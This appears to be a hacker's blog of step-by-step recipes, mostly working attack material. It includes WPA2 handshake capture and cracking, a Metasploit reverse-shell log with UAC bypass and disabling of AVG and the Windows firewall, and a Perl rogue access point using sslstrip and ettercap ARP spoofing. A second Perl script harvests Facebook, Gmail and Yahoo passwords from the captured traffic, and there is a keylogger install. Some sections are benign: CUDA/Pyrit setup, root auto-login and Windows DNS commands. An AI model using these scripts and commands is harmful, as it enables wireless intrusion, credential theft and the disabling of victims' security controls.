cracking WPA2 [Basic]

starts interface monitor mode
airmon-ng start wlan0

monitoring the air
airodump-ng mon0 --bssid 00:1E:58:BF:E9:73 -c 10 -w wpa2

send deauth packets and try to catch handshake
aireplay-ng mon0 -0 3 -a 00:1E:58:BF:E9:73 -c C4:17:FE:D6:17:19
WPA handshake: 00:1E:58:BF:E9:73

cracking with the wordlist
aircrack-ng wpa2-01.cap -w /pentest/passwords/wordlists/darkc0de.lst

Meterpreter Bypass windows 7 UAC, Cripple down AVG and Windows built-in Firewall

Handler
msf > use exploit/multi/handler msf exploit(handler) > set lhost 192.168.0.9 lhost => 192.168.0.9 msf exploit(handler) > set lport 1111 lport => 1111 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.0.9:1111 [*] Starting the payload handler... [*] Sending stage (752128 bytes) to 192.168.0.10 [*] Meterpreter session 1 opened (192.168.0.9:1111 -> 192.168.0.10:49156) at 2012-02-13 17:04:18 +0800 meterpreter > shell Process 1360 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>sc query avgwd sc query avgwd SERVICE_NAME: avgwd TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 C:\Windows\system32>sc config avgwd start= disabled sc config avgwd start= disabled [SC] OpenService FAILED 5: Access is denied.

Bypassuac
C:\Windows\system32>exit meterpreter > background msf exploit(handler) > use post/windows/escalate/bypassuac msf post(bypassuac) > show options Module options (post/windows/escalate/bypassuac): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST no Listener IP address for the new session LPORT 4444 no Listener port for the new session SESSION yes The session to run this module on. msf post(bypassuac) > set lhost 192.168.0.9 lhost => 192.168.0.9 msf post(bypassuac) > set lport 1111 lport => 1111 msf post(bypassuac) > set session 1 session => 1 msf post(bypassuac) > exploit [*] Started reverse handler on 192.168.0.9:1111 [*] Starting the payload handler... [*] Uploading the bypass UAC executable to the filesystem... [*] Meterpreter stager executable 73802 bytes long being uploaded.. [*] Uploaded the agent to the filesystem.... [*] Post module execution completed msf post(bypassuac) > [*] Sending stage (752128 bytes) to 192.168.0.10 [*] Meterpreter session 2 opened (192.168.0.9:1111 -> 192.168.0.10:49184) at 2012-02-13 17:06:03 +0800 [*] Session ID 2 (192.168.0.9:1111 -> 192.168.0.10:49184) processing InitialAutoRunScript 'migrate -f' [*] Current server process: rzHopEHJDLdv.exe (2504) [*] Spawning a notepad.exe host process... [*] Migrating into process ID 2488 msf post(bypassuac) > sessions -i 2 [*] Starting interaction with 2... meterpreter >

Disabling AVG Services at startup avgwd and AVGIDSAgent
meterpreter > execute -f cmd.exe -c -H Process 568 created. Channel 1 created. meterpreter > interact 1 Interacting with channel 1... Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\System32>sc config avgwd start= disabled sc config avgwd start= disabled [SC] ChangeServiceConfig SUCCESS C:\Windows\System32>sc config AVGIDSAgent start= disabled sc config AVGIDSAgent start= disabled [SC] ChangeServiceConfig SUCCESS

Disable Firewall
C:\Windows\System32>netsh firewall set opmode mode= disable netsh firewall set opmode mode= disable IMPORTANT: Command executed successfully. However, "netsh firewall" is deprecated; use "netsh advfirewall firewall" instead. For more information on using "netsh advfirewall firewall" commands instead of "netsh firewall", see KB article 947709 at http://go.microsoft.com/fwlink/?linkid=121488 . Ok.

Installation Cuda Toolkit and Cpyrit [Ubuntu 11.10]

Cuda Toolkit and GPU Computing SDK
step 1:
oleg@oneiric:~$ sudo apt-get install gcc-4.4 g++-4.4 build-essential

step 2:
oleg@oneiric:~$ sudo apt-get install nvidia-current nvidia-current-dev nvidia-current-updates nvidia-current-updates-dev

step 3:
oleg@oneiric:~$ wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/toolkit/cudatoolkit_4.1.28_linux_32_ubuntu11.04.run oleg@oneiric:~$ chmod 755 cudatoolkit_4.1.28_linux_32_ubuntu11.04.run oleg@oneiric:~$ sudo ./cudatoolkit_4.1.28_linux_32_ubuntu11.04.run

step 4:
oleg@oneiric:~$ wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/sdk/gpucomputingsdk_4.1.28_linux.run oleg@oneiric:~$ chmod 755 gpucomputingsdk_4.1.28_linux.run oleg@oneiric:~$ sudo ./gpucomputingsdk_4.1.28_linux.run

step 5:
oleg@oneiric:~$ sudo apt-get install freeglut3-dev libxi-dev

step 6:
oleg@oneiric:~$sudo ln -s /usr/lib/libXmu.so.6 /usr/lib/libXmu.so oleg@oneiric:~$sudo ln -s /usr/lib/nvidia-173/libGL.so /usr/lib/libGL.so

step 7:
oleg@oneiric:~$sudo nano ~/NVIDIA_GPU_Computing_SDK/C/common/common.mk
Edit the line
CFLAGS += $(CWARN_FLAGS) $(CXX_ARCH_FLAGS) LINKFLAGS += LINK += $(LINKFLAGS) $(CXX_ARCH_FLAGS)
Into this
CFLAGS += $(CWARN_FLAGS) $(CXX_ARCH_FLAGS) LINKFLAGS += -L/usr/lib/nvidia-current LINK += $(LINKFLAGS) $(CXX_ARCH_FLAGS)

step 8:
oleg@oneiric:~$cd ~/NVIDIA_GPU_Computing_SDK oleg@oneiric:~:~/NVIDIA_GPU_Computing_SDK$ make


Cpyrit
oleg@oneiric:~$ wget http://pyrit.googlecode.com/files/cpyrit-cuda-0.3.0.tar.gz oleg@oneiric:~$ tar xvzf cpyrit-cuda-0.3.0.tar.gz oleg@oneiric:~$ cd cpyrit-cuda-0.3.0 oleg@oneiric:~/cpyrit-cuda-0.3.0$ python setup.py build oleg@oneiric:~/cpyrit-cuda-0.3.0$ sudo python setup.py install
If this error occur
/usr/bin/ld: cannot find -lcuda collect2: ld returned 1 exit status
This fixes the error
oleg@oneiric:~$sudo ln -s /usr/lib/nvidia-current/libcuda.so /usr/lib/libcuda.so
Checking... Video Card must be displayed
pyrit list_cores
oleg@oneiric:~$ pyrit list_cores Pyrit 0.3.0 (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ The following cores seem available... #1: 'CUDA-Device #1 'GeForce 8600 GT'' #2: 'CPU-Core (SSE2)' #3: 'Network-Clients'
pyrit benchmark
oleg@oneiric:~$ pyrit benchmark Pyrit 0.3.0 (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ Running benchmark (1677.2 PMKs/s)... | Computed 1687.60 PMKs/s total. #1: 'CUDA-Device #1 'GeForce 8600 GT'': 1449.1 PMKs/s (RTT 2.7) #2: 'CPU-Core (SSE2)': 162.0 PMKs/s (RTT 3.0) #3: 'Network-Clients': 0.0 PMKs/s (RTT 0.0)

oleg's AP with Sslstrip and Ettercap

Stealing User Inputs over WLAN [facebook, yahoo, google, twitter etc...]
#!/usr/bin/perl print '**********************************************************'," \n"; print "\e[1;33m \n"; print " OLEG's rogue AP \n"; print " Author: s4m \n"; print " Disclaimer: [This code is for education purposes only, \n"; print " would not be responsible for any misuse of this code.] \e[m\n"; print '**********************************************************',"\n\n"; use Getopt::Std; chomp($n); chomp($c); chomp($w); getopts(":n:c:w:", \%args); if(defined $args{n}){$n = $args{n};} if(defined $args{c}){$c = $args{c};} if(defined $args{w}){$w = $args{w};} if((!defined $args{n} || !defined $args{c} || !defined $args{w}) || (($args{c} !~ /\d+/) || ($args{c} > 13) || ($args{c} == 0))){ print "Usage: ./f.pl -n <\"fake ap\"> -c <1-13> -w <capture.file>\n\n\n"; exit; } @wint = qx(cat /proc/net/dev | tr -s ' ' | cut -d ' ' -f2,2 | sed 's\/:\/\/g'); $lint = @wint; foreach(@wint){ if($_ =~ m/mon(\d)/){ &monDevUp($1); } } sub monDevUp{ chomp; print "Stop \e[1;32m$_\e[0m monitor mode?:(y/n) "; $ans = lc(<STDIN>); chomp($ans); if($ans eq "y"){ system("airmon-ng stop $_"); system("clear"); print "\e[1;32m",$_,"\e[0m--> \e[1;31mStopped...\e[0m\n"; }else{ "\n"; } } print "\nWireless Interface(s):\n"; foreach(@wint){ if($_ =~ m/wlan/){ print $_; } } print "\n\nSelect an interface: "; $a = <STDIN>; $j = 0; while($j <= $lint){ if($a eq @wint[$j]){ &wirelessDevUp(@wint[$j]); } $j++; } sub wirelessDevUp{ system("airmon-ng start $_[0]"); system("clear"); @mon = qx(airmon-ng | grep "mon" | cut -c1-4); $monlen = @mon; $monInt = @mon[$monlen - 1]; sleep 2; qx(konsole -e airbase-ng -e $n -c $c $monInt); sleep 5; system("ifconfig at0 up"); system("ifconfig at0 192.168.1.254 netmask 255.255.255.0"); system("route add -net 192.168.1.255 netmask 255.255.255.0 gw 192.168.1.254"); system("mkdir -p /var/run/dhcpd"); system("chown dhcpd:dhcpd /var/run/dhcpd"); system("dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0"); $dhcp = qx(/etc/init.d/dhcp3-server status); if($dhcp =~ m/dhcpd3 is not running./){ system("/etc/init.d/dhcp3-server start"); }else{ system("/etc/init.d/dhcp3-server restart"); } system("iptables -F"); system("iptables -t nat -F"); system("iptables --delete-chain"); system("iptables -t nat --delete-chain"); system("echo 1 > /proc/sys/net/ipv4/ip_forward"); system("iptables -t nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE"); system("iptables -A FORWARD --in-interface at0 -j ACCEPT"); system("iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.0.1"); system("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000"); sleep 4; qx(konsole -e sslstrip -a -l 10000 -w $w); }

Fire up Ettercap
ettercap -TqM arp:remote -i at0 // // -P remote_browser

Catching Prey
#!/usr/bin/perl print '**********************************************************'," \n"; print "\e[1;33m \n"; print " CATCHPREY \n"; print " Author: s4m \n"; print " Disclaimer: [This code is for education purposes only, \n"; print " would not be responsible for any misuse of this code.] \e[m\n"; print '**********************************************************',"\n\n"; use Getopt::Std; getopts(":c:",\%args); if(defined $args{c}){$c = $args{c};} if(!defined $args{c}){ print "\n\nUsage: ./catured.pl -c <input file from sslstrip>\n\n"; } open (F, "<$c") || die "couldn\'t open this file: $!\n"; @lines = <F>; foreach(@lines){ if(($_ =~ m/&email=(\S+)@(\w*\d*).(\w{3})&pass=(\S*)&default/)||($_ =~ m/&email=(\S+)%40(\w*\d*).(\w{3})&pass=(\S*)&persistent=1/)||($_ =~ m/&email=(\S+)%40(\w*\d*).(\w{3})&pass=(\S*)&default/)){ print "POSSIBLE FACEBOOK ACCOUNT\n"; print "\e[1;32mEMAIL\e[m : ".$1. '@' .$2. '.' .$3; print "\e[1;31m PASSWORD\e[m : " .$4; print "\n\n"; } if($_ =~ m/&Email=(\S+)&Passwd=(\S*)&signIn/){ print "POSSIBLE GMAIL ACCOUNT\n"; print "\e[1;32mEMAIL\e[m : ".$1; print "\e[1;31m PASSWORD\e[m : " .$2; print "\n\n"; } if(($_ =~ m/&login=(\S+)&pass=(\S*)&.saveC/)||($_ =~ m/&login=(\S+)&passwd=(\S*)&.persistent=y/)){ print "POSSIBLE YAHOO ACCOUNT\n"; print "\e[1;32mEMAIL\e[m : ".$1; print "\e[1;31m PASSWORD\e[m : " .$2; print "\n\n"; } } close (F);

BT Auto-Login

step 1: Install rungetty
root@bt:~#apt-get install rungetty

step 2: Edit tty1.conf
root@bt:~#nano /etc/init/tty1.config
Comment out #exec /sbin/getty -8 38400 tty1
Type this line exec /sbin/rungetty tty1 --autologin root
# tty1 - getty # # This service maintains a getty on tty1 from the point the system is # started until it is shut down again. start on stopped rc RUNLEVEL=[2345] stop on runlevel [!2345] respawn #exec /sbin/getty -8 38400 tty1 exec /sbin/rungetty tty1 --autologin root

step 3: Edit ~/.bash_profile
root@bt:~#touch /root/.bash_profile root@bt:~#nano /root/.bash_profile
Type in startx
startx

Save and Reboot
DONE!

Install Keylogger on Ubuntu [logkeys]

step 1: Download [logkeys]
~# wget http://logkeys.googlecode.com/files/logkeys-0.1.1a.tar.gz

step 2: Untar
~# tar -xvf logkeys-0.1.XX.tar.gz</span>

step 3: Install
~#cd logkeys-0.1.XX ~/logkeys-0.1.XX# ./configure ~/logkeys-0.1.XX# make ~/logkeys-0.1.XX# make check ~/logkeys-0.1.XX# make install

DONE!


how to use:
-s, --start start logging keypresses
-m, --keymap=FILE use keymap FILE
-o, --output=FILE log output to FILE [/var/log/logkeys.log]
-u, --us-keymap use en_US keymap instead of configured default
-k, --kill kill running logkeys process
-d, --device=FILE input event device [eventX from /dev/input/]
-?, --help print this help screen
--export-keymap=FILE export configured keymap to FILE and exit
--no-func-keys log only character keys
--no-timestamps don't prepend timestamps to log file lines
--post-http=URL POST log to URL as multipart/form-data file
--post-size=SIZE post log file when size equals SIZE [500k]

Examples: logkeys -s -m mylang.map -o ~/.secret-keys.log
logkeys -s -d event6
logkeys -k

My Example: logkeys -s -u -o log.txt

Windows Server 2003 - DNS Unattended Installation and Creating Zones

1. Type this in notepad, save it as unattended.txt .
[netoptionalcomponents] DNS=1

DNS=1 -->install DNS components
DNS=0 -->uninstall DNS components

2.Run this command at command prompt.
c:\sysocmgr /i:%systemroot%\inf\sysoc.inf /u:c:\unattended.txt

Create a Standard DNS Primary Zone
dnscmd server01 /zoneadd rosslab.it /primary /file rosslab.it.dns

Create a Standard DNS Secondary Zone
dnscmd server02 /zoneadd rosslab.it /secondary 192.168.1.1 /file rosslab.it.dns

Create a Reverse lookup Zone
-non-Integrated
dnscmd server01 /zoneadd 1.168.192.in-addr.arpa /primary /file reverselookup.dns
-Integrated
dnscmd server01 /zoneadd 1.168.192.in-addr.arpa /dsprimary

Create A (Host) Record.
dnscmd server01 /recordadd rosslab.it server01 A 192.168.1.1

Create PTR(Pointer) Record.
dnscmd server01 /recordadd 1.168.192.in-addr.arpa 1 PTR server01.oleglab.it

Create NS (Name Server) Record.
dnscmd server01 /recordadd rosslab.it @ NS server02.oleglab.it

Creates MX (Mail) Record.
dnscmd server01 /recordadd oleglab.it @ MX 3 mail.oleglab.it

Modify SOA (Start of Authority ) Record.
dnscmd server01 /recordadd rosslab.it @ SOA server01.oleglab.it mail.oleglab.it 2 600 300 86400 3600

Create CNANE (Alias) Record.
dnscmd server01 /recordadd oleglab.it oleg CNAME server01.oleglab.it